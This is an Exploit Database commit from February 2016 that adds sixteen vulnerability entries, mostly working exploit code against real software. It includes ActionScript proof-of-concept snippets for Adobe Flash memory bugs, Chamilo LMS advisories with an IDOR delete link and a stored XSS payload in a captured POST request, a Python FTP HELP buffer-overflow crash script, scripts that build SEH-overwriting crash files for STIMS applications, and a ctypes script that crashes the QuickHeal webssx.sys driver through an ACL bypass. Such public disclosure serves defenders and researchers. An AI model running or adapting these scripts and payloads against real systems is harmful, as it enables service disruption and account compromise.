DB: 2016-02-20

16 new exploits
2016-02-20 05:01:54 +00:00 · 2016-02-20 05:01:54 +00:00 · e149b72761
commit e149b72761
parent f48dc1ccea
17 changed files with 909 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35697,5 +35697,21 @@ id,file,description,date,author,platform,type,port
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
+39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
+39461,platforms/multiple/dos/39461.txt,"Adobe Flash -TextField Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0
+39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0
+39463,platforms/multiple/dos/39463.txt,"Adobe Flash - LoadVars.decode Use-After-Free",2016-02-17,"Google Security Research",multiple,dos,0
+39464,platforms/multiple/dos/39464.txt,"Adobe Flash - H264 Parsing Out-of-Bounds Read",2016-02-17,"Google Security Research",multiple,dos,0
+39465,platforms/multiple/dos/39465.txt,"Adobe Flash - ATF Processing Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0
+39466,platforms/multiple/dos/39466.txt,"Adobe Flash - H264 File Stack Corruption",2016-02-17,"Google Security Research",multiple,dos,0
+39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0
 39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
 39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
+39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP)  Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0
+39471,platforms/windows/dos/39471.txt,"STIMS Buffer - Buffer Overflow SEH - DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
+39472,platforms/windows/dos/39472.txt,"STIMS Cutter - Buffer Overflow DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
+39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability",2016-02-19,Vulnerability-Lab,php,webapps,0
+39474,platforms/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross Site Scripting Vulnerability",2016-02-19,Vulnerability-Lab,php,webapps,0
+39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver DoS Vulnerability",2016-02-19,"Fitzl Csaba",windows,dos,0
+39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
+39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
--- a/platforms/multiple/dos/39460.txt
+++ b/platforms/multiple/dos/39460.txt
@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=630
+
+The attached file can cause an out-of-bounds read of an image. While the bits of the image are null, the width, height and other values can make it a valid pointer. 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39460.zip
+
--- a/platforms/multiple/dos/39461.txt
+++ b/platforms/multiple/dos/39461.txt
@ -0,0 +1,25 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=701
+
+There is a type confusion vulnerability in the TextField constructor in AS3. When a TextField is constructed, a generic backing object is created and reused when subsequent TextField objects are created. However, if an object with the same ID has already been created in the SWF, it can be of the wrong type. The constructor contains a check for this situation, though, and throws an exception and sets a flag to shut down the player if this occurs. The backing object is then set to be of type TextField to avoid any modifications that have been made on it by the constructor from causing problems if it is used as an object of its original type elsewhere in the player.
+
+However, if the exception thrown by the constructor is caught, the exception handler can create another TextField object, and since the type of the generic backing object has been changed, an object of the wrong type is now backing the TextField, which makes it possible to set the pointers in the object to integer values selected by the attacker.
+
+The PoC swf for this issue needs to be created by hand. The original swf code is:
+
+try{
+
+     var t = new TextField();
+
+} catch(e:Error){
+
+     var t2 = new TextField();
+     t2.gridFitType;
+
+}
+
+Then in the swf, a backing object of a different type with ID 0xfff9 is created, which causes the first constructor call to fail, and the second to cause type confusion.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39461.zip
+
--- a/platforms/multiple/dos/39462.txt
+++ b/platforms/multiple/dos/39462.txt
@ -0,0 +1,33 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=698
+
+There is a dangling pointer that can be read, but not written to in loadPCMFromByteArray. A minimal PoC is as follows:
+
+	var s = new Sound();
+	var b = new ByteArray();
+	for( var i = 0; i < 1600; i++){
+		b.writeByte(1);
+	}
+	b.position = 0;
+	s.loadPCMFromByteArray(b, 100, "float", false, 2.0);
+	var c = new ByteArray();
+	for(var i = 0; i < 2; i++){
+			c.writeByte(1);	
+	}
+	c.position = 0;
+	try{
+		s.loadPCMFromByteArray(c, 1, "float", false, 2.0);
+	}catch(e:Error){		
+		trace(e.message);
+	}
+			
+	var d = new ByteArray();
+	s.extract(d, 1, 0);
+
+The PoC first loads PCM bytes correctly, setting an internal pointer to them. It then loads PCM bytes again, with a specific array length that passes the array length check, but then causes a exception to be thrown when reading the byte array. This causes the pointer to the original PCM array to be deleted, but then the function exits due to an exception before the pointer is set again. If the exception is caught, the sound object containing the dangling pointer can be used again. The sound.extract method reads directly out of the location the dangling pointer points to.
+
+A full PoC and swf are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39462.zip
+
--- a/platforms/multiple/dos/39463.txt
+++ b/platforms/multiple/dos/39463.txt
@ -0,0 +1,28 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=667
+
+There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:
+
+var lv = new LoadVars();
+var f = lv.decode;
+var tf = this.createTextField("tf",1, 2, 3, 4, 5);
+tf.natalie = "not test";
+tf.watch("natalie", func);
+f.call(tf, "natalie=test&bob=1");
+trace(tf.natalie);
+
+
+function func(){
+	
+	trace("here");
+	tf.removeTextField();	
+	return "test";
+
+	}
+	
+
+A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39463.zip
+
--- a/platforms/multiple/dos/39464.txt
+++ b/platforms/multiple/dos/39464.txt
@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=632
+
+There is an out-of-bounds read in H264 parsing, a fuzzed file is attached. To load, load LoadMP4.swf with the URL parameter file=compute_poc.flv from a remote server.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39464.zip
+
--- a/platforms/multiple/dos/39465.txt
+++ b/platforms/multiple/dos/39465.txt
@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=635
+
+The attached file causes a crash due to a heap overflow, probably due to an issue in ATF processing by the URLStream class.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39465.zip
+
--- a/platforms/multiple/dos/39466.txt
+++ b/platforms/multiple/dos/39466.txt
@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=633
+
+The attached flv file causes stack corruption when loaded into Flash. To use the PoC, load LoadMP42.swf?file=lownull.flv from a remote server.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39466.zip
+
--- a/platforms/multiple/dos/39467.txt
+++ b/platforms/multiple/dos/39467.txt
@ -0,0 +1,8 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=609
+
+The attached fuzz test case causes a crash due to a heap overflow in BitmapData.drawWithQuality.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39467.zip
+
--- a/platforms/multiple/dos/39476.txt
+++ b/platforms/multiple/dos/39476.txt
@ -0,0 +1,16 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=640
+
+There is a type confusion vulnerability in the SimpleButton constructor. Flash stores an empty button to use to create buttons for optimization reasons. If this object is created using a SWF tag before it is created in the Button class, and it not of type Button, type confusion can occur.
+
+A SWF needs to be altered in a hex editor to reproduce this issue. To start, build button.fla. This is a swf with the code:
+
+var sb = new SimpleButton();
+
+and a font attached. Decompress the swf using flasm -x button.swf, and then replace all occurrences of the font ID (0x0001) in the three tags that use it with the ID of the empty button object (0xfff6).  
+
+When the button is created, the font will be type confused with a button.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39476.zip
+
--- a/platforms/php/webapps/39473.txt
+++ b/platforms/php/webapps/39473.txt
@ -0,0 +1,135 @@
+Document Title:
+===============
+Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability 
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1720
+
+Video: https://www.youtube.com/watch?v=3ApPhUIk12Y
+
+
+Release Date:
+=============
+2016-02-15
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1720
+
+
+Common Vulnerability Scoring System:
+====================================
+6.1
+
+
+Product & Service Introduction:
+===============================
+Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. 
+It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and 
+the building of a network of services providers and software contributors.
+
+The Chamilo project aims at ensuring the availability and quality of education at a reduced cost, through the distribution of its software free of charge,
+the improvement of its interface for 3rd world countries devices portability and the provision of a free access public e-learning campus.
+
+(Copy of the Homepage: https://chamilo.org/chamilo-lms/ )
+
+
+Abstract Advisory Information:
+==============================
+An Insecure Direct Object Reference vulnerability has been discoverd in the official web-application Product Chamilo LMS.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-02-15: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+An insecure direct object references occurd when an application provides direct access to objects based on user-supplied input. 
+As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for deleting 
+another users social wall posts Insecure Direct Object References allow attackers to bypass authorization and access resources 
+directly by modifying the value of a parameter[Message id] used to directly point to an Message id of social wall post id. 
+
+Vulnerability Method(s):
+				[+] GET 
+
+Vulnerable File(s):
+				[+] social/profile.php
+
+Vulnerable Parameter(s):
+				[+] messageId
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+1. User A goes to User B or Admin soical wall in platform : /profile.php?u=[USER ID] 
+
+2. choose any Posts related to USER B or ADMIN . and figure out the messageId of Post by replaying to it and 
+intercept the data to show the messageId parameter. 
+
+3. User A as Remote attacker will use this link filled with messageId in last to delete others posts 
+http://SOMESITE/CHAMILOSCRIPTPATH/main/social/profile.php?messageId=28
+
+
+Security Risk:
+==============
+The security risk of the object reference web validation vulnerability in the web-application is estimated as high. (CVSS 6.1)
+
+
+Credits & Authors:
+==================
+Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
--- a/platforms/php/webapps/39474.txt
+++ b/platforms/php/webapps/39474.txt
@ -0,0 +1,193 @@
+Document Title:
+===============
+Chamilo LMS - Persistent Cross Site Scripting Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=
+
+Video: https://www.youtube.com/watch?v=gNZsQjmtiGI
+
+
+Release Date:
+=============
+2016-02-17
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1727
+
+
+Common Vulnerability Scoring System:
+====================================
+3.3
+
+
+Product & Service Introduction:
+===============================
+Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. 
+It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and 
+the building of a network of services providers and software contributors.
+
+The Chamilo project aims at ensuring the availability and quality of education at a reduced cost, through the distribution of its software free of charge,
+the improvement of its interface for 3rd world countries devices portability and the provision of a free access public e-learning campus.
+
+(Copy of the Homepage: https://chamilo.org/chamilo-lms/ )
+
+
+Abstract Advisory Information:
+==============================
+A persistent cross site scripting vulnerability has been discoverd in the official web-application Product Chamilo LMS.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-02-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A GET cross site scripting web vulnerability has been discovered in the official Netlife Photosuite Pro Content Management System.
+A vulnerability allows remote attackers to inject malicious script codes on the client-side of the affected web-application.
+
+The vulnerability is located in the `title` input field of the `work/upload.php` file. Remote attackers are able to inject own 
+malicious script codes to the client-side of the affected web-application. The request method to inject is POST and the attack 
+vector is client-side. The attacker injects the payload in the vulnerable input field to execute the code in view.php.
+
+The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
+Exploitation of the non-persistent cross site scripting web vulnerability requires low privileged web-application user account and low user interaction. 
+Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent 
+manipulation of affected or connected module context.
+
+
+Request Method(s):
+					[+] POST
+
+Vulnerable Module(s):
+					[+] work/
+
+Vulnerable File(s):
+					[+] upload.php
+					[+] view.php
+
+Vulnerable Parameter(s):
+					[+] title
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerability can be exploited by remote attackers without web-application user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the vulnerability ...
+1. Users goes to [ Course name > Assignments > ]
+2. users will follow the [Assignments] made by Course Trainer or admin of Chamilo platform . 
+3. Users will click on button titled as [ upload My Assignments] .
+4. an upload Document is Shown and A parameter [ Title ] is vulnerable to POC Payload ["><iframe src=http://vulnerability-lab.com >]
+5. when trainer or admin view Assignments of user, code is executed successfully 
+
+--- PoC Session Logs [POST] ---
+POST /site/main/work/upload.php?cidReq=[Course name]&id_session=0&gidReq=0&gradebook=0&origin=&id=1 HTTP/1.1
+Host: chamilo.org
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+
+Cookie: defaultMyCourseView15=0; __cfduid=dcb5fdb8a71117667369addf2c390449a331452648620; ch_sid=9daew954ef087c82cb0cab6037949478e
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------206976886318079499742071692496
+Content-Length: 1482
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="title"
+[<Persistent Code Injection>] 
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="description"
+<p>really thats out of brain</p>
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="submitWork"
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="_qf__form"
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="contains_file"
+0
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="active"
+1
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="accepted"
+1
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+134217728
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="id"
+1
+-----------------------------206976886318079499742071692496
+Content-Disposition: form-data; name="sec_token"
+435ad99d48d0fe2e6bed594707dffc1d
+-----------------------------206976886318079499742071692496--
+
+
+Security Risk:
+==============
+The security risk of the persistent cross site script vulnerability in the web-application is estimated as medium. (CVSS 3.3)
+
+
+Credits & Authors:
+==================
+Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
--- a/platforms/windows/dos/39470.py
+++ b/platforms/windows/dos/39470.py
@ -0,0 +1,38 @@
+#!/usr/bin/python
+#XM Easy Personal FTP Server 5.8.0 (HELP) Denial of Service
+#Tested on : Windows XP SP 3 EN
+#Author : Pawan Lal   dxb.pawan@gmail.com
+#Date : 18-02-2016
+ 
+import socket
+import sys
+  
+def Usage():
+    print ("Usage: ./ftpxmftpdosbackup.py <FTP IP> <Username> <Password>\n")
+buffer= "A" * 4500
+def start(hostname, username, passwd):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.connect((hostname, 21))
+    except:
+        print ("[-] Connection error!")
+        sys.exit(1)
+    r=sock.recv(1024)
+    print "[+] " + r
+    sock.send("user %s\r\n" %username)
+    r=sock.recv(1024)
+    sock.send("pass %s\r\n" %passwd)
+    r=sock.recv(1024)
+    print "[+] Evil Payload i.e buffer"
+    sock.send("HELP %s\r\n" %buffer)
+    sock.close()
+  
+if len(sys.argv) <> 4:
+    Usage()
+    sys.exit(1)
+else:
+    hostname=sys.argv[1]
+    username=sys.argv[2]
+    passwd=sys.argv[3]
+    start(hostname,username,passwd)
+    sys.exit(0)
--- a/platforms/windows/dos/39471.txt
+++ b/platforms/windows/dos/39471.txt
@ -0,0 +1,62 @@
+# Exploit Title: STIMS BUFFER OVERFLOW SEH OVERWRITE
+# Date: 19 Feb 2016
+# Exploit Author: Ishita Sailor <ishitasailor@gmail.com>
+# Vendor Homepage: http://www.stimslabs.com/
+# Software Link: http://www.stimslabs.com/en/buffer/STIMSBufferEnSetup.exe
+# Version: 1.1.20
+# Tested on: Windows XP SP3
+# CVE : UNKNOWN
+# ==============HOW TO CRASH ==================
+#make the buff file and open it it the STIMSBuffer application.
+#Click on View Report
+#===========================================
+#Problems in exploitation
+#Unable to find suitable SEH pointer
+#
+
+
+#!/usr/bin/env python
+f=open("crash.buff","w")
+payload="""<!--block:#solution-->
+[solution]
+name="""
+payload +="\x41"*8460
+payload +="\x42"*4 #SEH overwrite
+
+payload +="""desc=asdasdasd
+time=0
+version=1
+file=C:\Documents and Settings\IEUser\Desktop\z.buff
+time.created=131003052796300000
+app=1.1.1
+projects=1
+time.last=131003052894110000
+<!--#solution:block-->
+<!--block:Buffer 1-->
+[properties]
+buffer.id=0
+buffer.name=Maleic acid / sodium hydrogen maleate
+buffer.desc=Maleic acid / sodium hydrogen maleate with pKa 2
+buffer.inp.pka=2.00000
+buffer.inp.vol=1000.000000
+buffer.inp.ph=2.000000
+buffer.inp.conc=1.000000
+buffer.inp.temp=24.000000
+buffer.out.strength=0.592637
+buffer.out.sln1.name=Maleic acid
+buffer.out.sln1.conc=3.000000
+buffer.out.sln1.vol=135.787622
+buffer.out.sln2.name=Sodium hydrogen maleate
+buffer.out.sln2.conc=3.000000
+buffer.out.sln2.vol=197.545712
+buffer.out.water=1000.000000
+comment=
+comment.active=0
+notes=
+notes.active=0
+name=Buffer 1
+active=1
+<!--Buffer 1:block-->
+"""
+f.write(payload)
+f.close()
--- a/platforms/windows/dos/39472.txt
+++ b/platforms/windows/dos/39472.txt
@ -0,0 +1,92 @@
+# Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE
+# Date: 19 Feb 2016
+# Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com
+<ishitasailor@gmail.com>>
+# Vendor Homepage: http://www.stimslabs.com/
+# Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe
+# Version: 1.1.3.20
+# Tested on: Windows XP SP3
+# CVE : UNKNOWN
+# ==============HOW TO CRASH ==================
+#make the cutt file and open it it the STIMS Cutter application.
+#Click on Build Report
+#===========================================
+#Problems in exploitation
+#Unable to find suitable SEH pointer
+#
+
+
+#!/usr/bin/env python
+f=open("crash.cutt","w")
+
+payload = """<!--block:#solution-->
+[solution]
+name="""
+payload+="A"*8452
+payload +="BBBB" #SEH overwrite
+payload +="""CCCC
+desc=A
+time=0
+version=1
+file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
+time.created=131003117142810000
+app=1.1.3
+projects=1
+<!--#solution:block-->
+<!--block:A-->
+[properties]
+optimize=0
+level=0
+diversity=0
+status=0
+active=1
+remnants=0
+sort=0
+version=1
+desc=S
+comment=
+comment.active=0
+notes=
+notes.active=0
+material=A
+progress=100
+calculation=0D99FF12
+cost=222.000
+time.gone=0
+time.date=2016 Feb 18 23.29.14
+payload=2
+file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
+app=1.1.3
+
+[order.blanks]
+b001={ "uid": "908113387", "material": "A", "length": "222", "quantity":
+"1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id":
+"1", "name": "a" }
+
+[order.pieces]
+p001={ "uid": "124270241", "material": "A", "length": "111", "quantity":
+"1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" }
+
+[layout.summary]
+summary={ "output": "112.000", "used.len": "222.000", "used": "1",
+"pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1",
+"remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu":
+"1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone":
+"0", "time.date": "2016 Feb 18 23.29.14" }
+blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1",
+"pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output":
+"112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu":
+"1.982", "remnants": "0.000" }
+
+[layout.cuttings]
+c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
+"shifts": "1", "output": "#1 1", "layout": "111" }
+
+[layout.cuttings.parts]
+c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
+"shifts": "1", "output": "#1 1", "layout": "111", "name": "1" }
+<!--A:block-->
+"""
+
+f.write(payload)
+f.close()
--- a/platforms/windows/dos/39475.py
+++ b/platforms/windows/dos/39475.py
@ -0,0 +1,78 @@
+# Exploit Title: QuickHeal webssx.sys driver DOS vulnerability
+# Date: 19/02/2016
+# Exploit Author: Csaba Fitzl
+# Vendor Homepage: http://www.quickheal.co.in/
+# Version: 16.00
+# Tested on: Win7x86, Win7x64
+# CVE : CVE-2015-8285
+
+from ctypes import *
+from ctypes.wintypes import *
+import sys
+
+kernel32 = windll.kernel32
+ntdll = windll.ntdll
+
+#GLOBAL VARIABLES
+
+MEM_COMMIT = 0x00001000
+MEM_RESERVE = 0x00002000
+PAGE_EXECUTE_READWRITE = 0x00000040
+STATUS_SUCCESS = 0
+
+def alloc_in(base,evil_size):
+	""" Allocate input buffer """
+	print "[*] Allocating input buffer"
+	baseadd   = c_int(base)
+	size = c_int(evil_size)
+	evil_input = "\x41" * 0x10
+	evil_input += "\x42\x01\x42\x42" #to trigger memcpy
+	evil_input += "\x42" * (0x130-0x14)
+	evil_input += "\xc0\xff\xff\xff" #this will cause memcpy to fail, and trigger BSOD
+	evil_input += "\x43" * (evil_size-len(evil_input))
+	ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, 
+											  POINTER(c_int), c_int, c_int]
+	dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, 
+											 byref(size), 
+											 MEM_RESERVE|MEM_COMMIT,
+											 PAGE_EXECUTE_READWRITE)
+	if dwStatus != STATUS_SUCCESS:
+		print "[-] Error while allocating memory: %s" % hex(dwStatus+0xffffffff)
+		sys.exit()
+	written = c_ulong()
+	alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base, evil_input, len(evil_input), byref(written))
+	if alloc == 0:
+		print "[-] Error while writing our input buffer memory: %s" %\
+			alloc
+		sys.exit()
+
+if __name__ == '__main__':
+	print "[*] webssx BSOD"
+	
+	GENERIC_READ  = 0x80000000
+	GENERIC_WRITE = 0x40000000
+	OPEN_EXISTING = 0x3
+	IOCTL_VULN	= 0x830020FC
+	DEVICE_NAME   = "\\\\.\\webssx\some" #add "some" to bypass ACL restriction, (FILE_DEVICE_SECURE_OPEN is not applied to the driver)
+	dwReturn	  = c_ulong()
+	driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
+
+	inputbuffer	   = 0x41414141 #memory address of the input buffer
+	inputbuffer_size  = 0x1000
+	outputbuffer_size = 0x0
+	outputbuffer	  = 0x20000000 
+	alloc_in(inputbuffer,inputbuffer_size)
+	IoStatusBlock = c_ulong()
+	if driver_handle:
+		print "[*] Talking to the driver sending vulnerable IOCTL..."
+		dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
+									   None,
+									   None,
+									   None,
+									   byref(IoStatusBlock),
+									   IOCTL_VULN,
+									   inputbuffer,
+									   inputbuffer_size,
+									   outputbuffer,
+									   outputbuffer_size
+									   )
--- a/platforms/windows/webapps/39477.txt
+++ b/platforms/windows/webapps/39477.txt
